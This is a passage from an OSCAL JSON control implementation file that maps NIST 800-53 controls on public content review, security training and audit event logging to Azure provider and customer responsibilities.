statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2f563987-9b07-498b-9c91-4afd2e98f8d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-089"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-22_smt.c","by-components":[{"uuid":"956fa8f5-a0c1-4011-89f5-8809e01a5ebb","export":{"provided":[{"uuid":"8bdda9f6-c89c-4d9a-be79-bac73d151591","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-089"}],"description":"All information must go through the Microsoft Content Management Team for review prior to being posted to ensure that nonpublic information is not made available. This review occurs as part of the normal change management processes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7c170ee1-dbc5-4cae-bc2f-16510337cc42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-089"}],"description":"The customer is responsible for reviewing proposed content of customer-controlled information prior to posting publicly to ensure nonpublic information is not included.","provided-uuid":"8bdda9f6-c89c-4d9a-be79-bac73d151591"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0e4d6254-cc09-4931-89dd-c56301a89796","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-090"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-22_smt.d","by-components":[{"uuid":"b3d33581-eac4-47aa-af6a-07375694c2e0","export":{"provided":[{"uuid":"8e8d9a8d-3264-44bf-96d6-01a2def276e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-090"}],"description":"The Marketing Communications team leverages an automated tool to measure volume and sentiment for social conversations around products, events, announcements, and crises. The automated tool gathers data using a number of different methods, including web crawlers, through direct relationships, and through various Application Programming Interfaces (APIs). The tool actively collects Microsoft mentions across Twitter, news sites, forums, blogs, and general public sites. The automated tool provides alerts to the Marketing Communications team based on configuration. On a monthly cadence, the Marketing Communications team prepares a Cloud Blog and Social Cloud Marketing report to manage ecosystem performance, workload performance, followers, posts, and engagements across different platforms. If any nonpublic information is identified with the automated tool alerts and in the process of producing the Cloud Blog and Social Marketing report, the Azure incident response process is followed through crisis communications to investigate and remediate the issue._x000D_ _x000D_"}],"responsibilities":[{"uuid":"6133444b-d6db-4ac0-854e-6eba6e6f18f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-090"}],"description":"The customer is responsible for periodically reviewing publicly available customer-controlled content for nonpublic information.","provided-uuid":"8e8d9a8d-3264-44bf-96d6-01a2def276e9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"45e3a803-3148-45a9-9f78-56a494bc3c6a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-2","statements":[{"uuid":"f2c329ea-bdcd-4e59-84ce-98d022746733","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-2_smt.a","by-components":[{"uuid":"4a1f4735-b740-4dc7-a1d9-f03189309beb","export":{"provided":[{"uuid":"6e20e262-16ff-41d5-9209-c24737a93cc0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-006"}],"description":"The annual Security Foundations Training includes basic level training on how to detect, report and implement best practices to safeguard Microsoft and its customers. This course also covers the security requirements and expectations for elevated privileges in production environments. Engineering personnel participate in ongoing role-based security training through the STRIKE program. STRIKE provides regular 200-400 level sessions, labs, online courses, and material to engage, educate, and empower engineers to securely design and operate services. Azure requires all personnel to complete the following training as part of their onboarding process: * Security Foundations Training - Azure new hire personnel are required to take the Security Foundations Training within thirty (30) days of employment, and annually thereafter. STRIKE training, covering security topics for engineering roles is recommended as part of continued learning."}],"responsibilities":[{"uuid":"69003d93-f27d-46f4-9755-d7de9d5858f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-006"}],"description":"The customer is responsible for providing basic security awareness training to all users of customer-deployed resources as part of initial training.","provided-uuid":"6e20e262-16ff-41d5-9209-c24737a93cc0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"39934c96-4a5e-4b87-990a-8ea60258c8bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-2_smt.b","by-components":[{"uuid":"3a9a91af-267a-4927-addf-6a1a5b9f3f2b","export":{"provided":[{"uuid":"fc650d6b-7d3e-4d06-b766-23aae789bdd8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-007"}],"description":"STRIKE and Security Foundations Training trainings are updated on a regular basis to account for updates or changes that render previous training inaccurate. The trainings are sent to personnel supporting the operations of Azure cloud environments through automated learning system communications. Training completions are documented and retained for investigation purposes."}],"responsibilities":[{"uuid":"076117ee-7358-49f7-837d-093786507c05","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-007"}],"description":"The customer is responsible for providing updated basic security awareness training to all users when required by changes to customer-deployed resources.","provided-uuid":"fc650d6b-7d3e-4d06-b766-23aae789bdd8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"050d1169-e3f8-4fda-bb07-879ea6026366","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-2_smt.c","by-components":[{"uuid":"09525b0b-2d9e-4a58-962e-75f89a2eceb4","export":{"provided":[{"uuid":"10db2330-af51-44e2-9cd0-6d4b1719c801","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-008"}],"description":"The annual Security Foundations Training includes basic level training on how to detect, report and implement best practices to safeguard Microsoft and its customers. Engineering personnel are recommended to participate in ongoing role-based security training through the STRIKE program. STRIKE provides regular 200-400 level sessions, labs, online courses, and materials to engage, educate and empower engineers to securely design and operate services."}],"responsibilities":[{"uuid":"1607ad79-b3dd-4fa7-b47a-20a739f7575a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-008"}],"description":"The customer is responsible for providing ongoing, periodic basic security awareness training to all users.","provided-uuid":"10db2330-af51-44e2-9cd0-6d4b1719c801"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2f0476bb-c260-4f24-b709-6db6eee3c341","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-2.2","statements":[{"uuid":"a40311f0-465b-4382-a18c-c01dc32d7cd2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-2.2_smt","by-components":[{"uuid":"4e52c6ee-be7a-4cbe-9413-c181dd2cb0ec","export":{"provided":[{"uuid":"8316467c-8cdb-4c0b-8555-41a0ab5c4746","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-009"}],"description":"The annual security foundations training includes information on recognizing and reporting potential indicators of insider threat as well as instruction for reporting anything suspicious and anomalous behavior in production environments. All personnel with elevated access to Azure are required to complete the Security Foundations course or complete participation in STRIKE. Course completion is required to maintain current account access and prior to the provisioning of any new accounts._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c05d2210-aa19-443f-b832-c603829df976","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-009"}],"description":"The customer is responsible for providing training on insider threats.","provided-uuid":"8316467c-8cdb-4c0b-8555-41a0ab5c4746"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"acadef8f-2c31-48c8-87b8-c60a1f2d2178","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-2.3","statements":[{"uuid":"ef947763-2d35-4b80-95bb-e3d01e599501","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-2.3_smt","by-components":[{"uuid":"75a243e8-d729-4b58-9068-a7165845fab4","export":{"provided":[{"uuid":"f8afd7de-beaa-4080-a6e0-206be1696002","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-010"}],"description":"The annual STRIKE or security foundations training include basic level training on how to detect and report social engineering and social mining attempts including methods such as dumpster diving, phishing, pretexting, shoulder surfing, baiting, quid pro quo, thread-jacking, social media exploitation, tailgating, and telephone impersonation."}],"responsibilities":[{"uuid":"9e608dc9-2d70-4671-9617-c6be60b64fa4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-010"}],"description":"The customer is responsible for providing literacy training and awareness for their own personnel.","provided-uuid":"f8afd7de-beaa-4080-a6e0-206be1696002"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"606e7bf5-1abc-4368-a0f2-4d6e81e3dd8e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-3","statements":[{"uuid":"91a38ead-cbf7-428d-a7ff-3d882e480532","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-3_smt.a","by-components":[{"uuid":"9d0e1b93-c640-4ae0-b658-3e3bbae9ca09","export":{"provided":[{"uuid":"719a6775-9971-42a9-96de-367de67c1bc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-011"}],"description":"Microsoft C+AI training and awareness components are classified into one of two types: Role-Based and Required. Microsoft C+AI training and awareness components are classified into one of two types: Role-Based and Required. Role-Based Training Role-Based training is provided to help facilitate the understanding of security processes and procedures for a particular role an individual is placed in and is directly related to the job responsibilities of the individual. Role-Based training is offered to full-time personnel through the STRIKE program for engineering disciplines providing 200-400 level security training and best practices. Required Training Required training is mandatory security and awareness education that the Information Risk Management Council (IRMC) has specifically identified and defined as appropriate for Azure personnel based upon their organization. Required annual training includes Security Foundations Training for employees. STRIKE training is provided for continual learning of those in engineering roles. Azure personnel are required to take the above trainings as required by information system changes. Role-Based Training Role-Based training is mandatory security and awareness education that is deemed helpful in the facilitation of understanding security processes and procedures for a particular role an individual is placed in and is directly related to the job responsibilities of the individual. Role-Based training is offered to full-time personnel through the STRIKE program for engineering disciplines providing 200-400 level security training and best practices. Required Training Required training is mandatory security and awareness education that the Information Risk Management Council (IRMC) has specifically identified and defined as appropriate for Azure personnel based upon their organization. Required annual training includes Security Foundations for new hires and non-engineering FTEs and the STRIKE program for engineering FTEs."}],"responsibilities":[{"uuid":"01b0c8ee-e8d7-4a48-8382-5845cd8e5694","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-011"}],"description":"The customer is responsible for providing role-based security training to users before authorizing access to customer-deployed resources or performing assigned duties. The customer is also responsible for providing role-based security training to all identified roles when required by changes to customer-deployed resources.","provided-uuid":"719a6775-9971-42a9-96de-367de67c1bc1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c1cd9573-5a53-4bcd-b685-d49446cac88f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-3_smt.b","by-components":[{"uuid":"bf4237cd-a125-43df-a892-7edce4e4f430","export":{"provided":[{"uuid":"cf9c3bc8-dd2d-41af-bfeb-456d3451631d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-012"}],"description":"Azure updates role-based training content through STRIKE program on at least annual basis."}],"responsibilities":[{"uuid":"29644c04-4e94-4ca3-b3c0-f20da932fb10","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-012"}],"description":"The customer is responsible for updating role-based training at a defined frequency for customer-deployed resources.","provided-uuid":"cf9c3bc8-dd2d-41af-bfeb-456d3451631d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5cafbe59-ffbe-40bd-8da2-40fa0b348138","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-3_smt.c","by-components":[{"uuid":"760ea4d9-e824-444f-b0c4-24ef2ad687fd","export":{"provided":[{"uuid":"afa43893-aee7-4d1a-9177-32fc227b6e1f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-013"}],"description":"The above training is required to be taken by personnel on an annual basis. Azure confirms a user has taken the training through the Microsoft Learning Program. Microsoft management communicates this responsibility to all applicable managers who grant access to Azure data. The Microsoft Learning Program incorporates lessons learned from internal and external security incidents or breached into the role-based trainings executed through STRIKE program."}],"responsibilities":[{"uuid":"c0556fdb-f22f-465d-b177-75d27044e994","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-013"}],"description":"The customer is responsible for providing ongoing, periodic role-based security training to all identified roles. The customer is also responsible for incorporating lessons learned from internal or external security incidents or breaches into role-based training for customer-deployed resources.","provided-uuid":"afa43893-aee7-4d1a-9177-32fc227b6e1f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b0049a50-28d3-4859-855d-bc7a857a55bb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-4","statements":[{"uuid":"1db9b4da-f958-4b36-88ed-8c9a1af9c65f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-4_smt.a","by-components":[{"uuid":"788096ff-d5a3-44b6-aef9-ebc6c27ab9cb","export":{"provided":[{"uuid":"7e1f01f3-a4e3-407e-a999-4860f5d4b07d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-014"}],"description":"Azure utilizes SuccessFactors Learning Management System (LMS) to document and monitor security and privacy training. The LMS provides reporting to effectively manage and track security training participation. Security training and privacy training records are documented, monitored, and retained for at least five (5) years."}],"responsibilities":[{"uuid":"0fed5d9b-465c-410a-ba58-54f0615db119","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-014"}],"description":"The customer is responsible for documenting and monitoring all system security and privacy training activities for customer-deployed resources.","provided-uuid":"7e1f01f3-a4e3-407e-a999-4860f5d4b07d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c65d7043-8532-492c-b954-28a08b52ce89","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-015"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-4_smt.b","by-components":[{"uuid":"5f2d6b4f-c9a3-4b84-873f-fdde9637ee24","export":{"provided":[{"uuid":"fd2b9a9d-bc8f-45c5-ad8c-114f732dc7c0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-015"}],"description":"Azure retains records of all security training for at least five (5) years in the LMS."}],"responsibilities":[{"uuid":"e521b74f-ff06-4374-8f50-f7684c317dea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-015"}],"description":"The customer is responsible for retaining individual training records for users of customer-deployed resources.","provided-uuid":"fd2b9a9d-bc8f-45c5-ad8c-114f732dc7c0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2f5a031a-573a-467a-864c-b6682c4765c8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-2","statements":[{"uuid":"faf42a4e-aef0-42c1-985c-9f456205c170","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-2_smt.a","by-components":[{"uuid":"0313309a-8f11-450b-aa5d-78d9179bacd6","export":{"provided":[{"uuid":"d3b9a6a9-a2e6-40ec-a9a7-dbf1459e9cfe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-006"}],"description":"The Azure Security Logging and Monitoring (SLAM) team and the Security Response Team have developed sets of auditable events for Azure assets based on ongoing risk assessments of the system which incorporate government and industry baselines and requirements, identified vulnerabilities, business requirements, and Azure and C+AI Security Standards. The event sets are reviewed by the SLAM and Security Response Team when a significant change to the system is made to ensure any vulnerabilities exposed are being addressed by the set of auditable events. New events are incorporated when a new asset class is brought online or when a vulnerability or threat is identified through security assessments, security bulletins, and more. Azure Security Pack (AzSecPack) and Geneva Monitoring, composed of Logs, Metrics, and Analytics, are the main drivers of audit log collection. AzSecPack is deployed via the Geneva Monitoring Agent (MA), covering both Windows and Linux operating systems and operating as the raw event source. AzSecPack monitors events throughout the Azure environment in an automated fashion, feeding logs through Azure Security Monitoring (ASM), Kusto, and SCUBA to identify and alert on events of interest. Personnel can use Kusto and Jarvis to examine the logs in human-readable format. All asset types supporting Azure's cloud environments are configured to log the following events: Successful and unsuccessful account logon events, successful and unsuccessful attempts to access, modify, or delete privileges, account management events, privileged activities, security objects, security levels, or categories of information (e.g., classification levels), object access, policy change, privilege functions, process tracking, starting and ending time for user access to the system, concurrent logons from different workstations, successful and unsuccessful accesses to objects, all program initiations, all direct access to the information system, all account creations, modifications, disabling, and terminations, all kernel module load, unload, all administrator activity, authentication checks, authorization checks, data deletions, data access, data changes, and permission changes and restart, and system events. Servers For server assets, the audit policy is set as part of installing AzSecPack on a given server, required for Azure. AzSecPack collects all server asset logs and sends them to the Geneva Monitoring Agent (MA), a client executable that is run on the asset to collect logs and upload them to Azure storage accounts owned by the service team. Geneva Monitoring then ingests and analyzes the logs via multiple detection services, including but not limited to Azure Security Monitoring (ASM), Kusto, and SCUBA, for events requiring alerting. Network Devices Utilizing the audit log collection tool protocol and event collection infrastructure, Azure retrieves events from network device syslog. The logs are sent to servers running AzSecPack for storage and processing for format and content via Geneva Monitoring. Geneva Monitoring then ingests and analyzes the logs via multiple detection services, including but not limited to Azure Security Monitoring (ASM), Kusto, and SCUBA, for events requiring alerting. Azure Services Service teams configure their service to generate audit logs based upon the service-specific risk assessment. Service teams are responsible for configuring service-layer audit logs as a part of the Security Development Lifecycle (SDL) process using the OpenTelemetry Audit instrumentation, feeding into the Geneva MA and the pipeline described above."}],"responsibilities":[{"uuid":"dd65d89a-631c-4be1-8ef1-56c15f1710c6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-006"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for identifying the types of events that the customer-deployed resources are capable of logging.","provided-uuid":"d3b9a6a9-a2e6-40ec-a9a7-dbf1459e9cfe"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1f9ad09b-2278-4818-aaeb-212b1c182ba6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-2_smt.b","by-components":[{"uuid":"4ccde4ad-a99f-4753-85b0-70c9684fb6c0","export":{"provided":[{"uuid":"5984a157-d29f-4c10-9baf-15b1f8fb1544","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-007"}],"description":"Azure incorporates business requirements from Azure as a whole and from individual service teams when developing the set of auditable events. The Azure Security team meets on a formal and regular basis to coordinate and collaborate on security, auditing, and monitoring objectives."}],"responsibilities":[{"uuid":"b8e6599b-325b-447d-afcd-633c2a2f8be8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-007"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for coordinating with other entities within its organization to guide the selection of auditable events for customer-deployed resources.","provided-uuid":"5984a157-d29f-4c10-9baf-15b1f8fb1544"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b821c5f3-79d6-4bb3-b959-740b038eb4a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-2_smt.c","by-components":[{"uuid":"932104c6-a658-4e08-b87f-af67836457ca","export":{"provided":[{"uuid":"00d5af57-8689-4c96-a9f2-50136652f55e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-008"}],"description":"Servers: The configuration file for AzSecPack specifies the audit events. Events are audited continually in near-real time. These events are based on the assessment of risk to the system and the Microsoft Security Standards used across the organization. These events align with the server baselines updated semi-annually and available to all Microsoft users. Network Devices: While each network device type has specific events and metadata options, Azure Networking selects the level of auditing to meet or exceed the audited events defined by the Azure SLAM team and configures the devices appropriately."}],"responsibilities":[{"uuid":"bb16e3bc-a53f-448b-9b69-8a77ba143b44","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-008"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for selecting a subset of the events defined in AU-02.a to be audited on customer-deployed resources.","provided-uuid":"00d5af57-8689-4c96-a9f2-50136652f55e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0a48d51c-5677-4df4-a80b-8084fcef883d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-2_smt.d","by-components":[{"uuid":"0eabeac7-0436-430a-a8e2-a40614332bb1","export":{"provided":[{"uuid":"73536957-3cd3-4049-914c-08fabf94b881","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-009"}],"description":"Designated Azure personnel select which auditable events are to be audited, and Azure assets generate such audit records which enable Azure Security to support after-the-fact investigations of security incidents. The Security Response Team is involved in determining which events should be audited to support the incident management process and it has been determined that the selected events are sufficient to support the after-the-fact investigations of security incidents. Azure performs a review of the events to be audited within Azure at least annually, using several sources of input including security architects, incident management personnel, security analysts, and system operators, to determine that the list of auditable events is adequate to support after-the-fact investigations of security incidents."}],"responsibilities":[{"uuid":"fe4b0df7-5df9-4384-9bdf-9de46c8b100c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-009"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for ensuring the list of auditable events supports after-the-fact investigations of customer-deployed resources.","provided-uuid":"73536957-3cd3-4049-914c-08fabf94b881"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1e483acb-e032-4c78-83ed-cd0211fb97d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-2_smt.e","by-components":[{"uuid":"cae4bbfa-ffb9-476d-a339-bcafeca63731","export":{"provided":[{"uuid":"89a26c9e-b41c-4964-96aa-46ff0415e4cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-010"}],"description":"Azure Security reviews the events to be audited within Azure at least annually using several sources of input, including the Security Engineering Team, Service Engineer Operations, Azure Engineers, Azure security architects, incident management personnel, Azure security analysts, and system operators to determine whether the list of auditable events is adequate to support after-the-fact investigations of security incidents. C+AI Security also reviews the events to be audited whenever changes in the threat environment are identified internally or communicated to Azure by the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required. If updates are needed, C+AI Security updates the list upon completion of the review. In addition to the annual and threat-based reviews, C+AI Security performs ongoing reviews of rule sets when Security Response Team Tier 2 personnel process events. If the rule sets are deemed insufficient because of an event review, after being vetted by the Security Response Team leader, feature requests are placed into the bug tracking tool to change rules to the auditable events. These changes are subject to peer 